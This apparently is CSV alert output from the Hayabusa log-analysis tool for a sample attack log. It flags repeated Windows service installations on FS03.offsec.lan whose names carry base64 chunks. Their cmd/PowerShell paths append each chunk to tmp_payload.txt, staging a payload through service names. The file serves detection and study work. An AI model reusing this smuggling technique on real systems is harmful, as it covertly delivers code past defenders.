+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
